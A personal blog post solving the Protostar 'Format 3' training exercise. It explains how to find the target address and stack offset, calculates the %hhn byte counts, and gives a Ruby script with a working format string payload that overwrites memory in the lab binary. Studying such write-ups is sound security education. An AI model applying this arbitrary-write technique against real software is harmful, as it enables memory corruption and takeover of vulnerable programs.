Saturday 24 August 2013

Exploit exercises - Protostar - Format 3

Format 3 was quite easy after the way I've tried to solve Format 0 :) . Third task in format section required to write four bytes into specific location in memory.


As with other format exercises first task is to find target address(Using objdump -t). Also find user-supplied input on the stack (Using breakpoint in gdb just before printf call and listing the stack).

Next task is to overwrite carefully target variable. In this exercise all 4 bytes had to be overwritten. I decided to overwrite them byte by byte using %hhn format string parameter.

You need to calculate number of printed characters carefully to successfully overwrite the target variable . Since we work with little-endian architecture you have to write 0x44 to 0x080496f4 , 0x55 to 0x080496f5, 0x02 to 0x080496f6, 0x01 to 0x080496f7.
First 16 bytes are little-endian addresses(See script) (0x080496f4 0x080496f5 0x080496f6 0x080496f7). Next we have to write 0x44 - 0x10 = 0x34 which is 52 bytes so we put %52x parameter and %12hhn to use first DWORD from our input as an address. After that we should write 0x55 - 0x44 = 0x11 which is 17 bytes and %13$hhn. After that you have to write 0x102 - 0x55 = 173 bytes and use 14th parameter to write. And lastly write 0x101 - 0x02 = 255 bytes and use 15th parameter from the stack. Note that use of hhn modifier trims printed bytes count to one byte so last two byte values were overflown and trimmed giving us appropriate result.

Script:
#!/usr/bin/ruby1.9.1
require 'open3'

fmt_string = "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08\xf7\x96\x04\x08%52x%12$hhn%17x%13$hhn%173x%14$hhn%255x%15$hhn"
stdin, stdout,stderr = Open3.popen3('/opt/protostar/bin/format3')
puts fmt_string
stdin.puts fmt_string
puts stdout.gets
puts stdout.gets

Screenshot:

No comments:

Post a Comment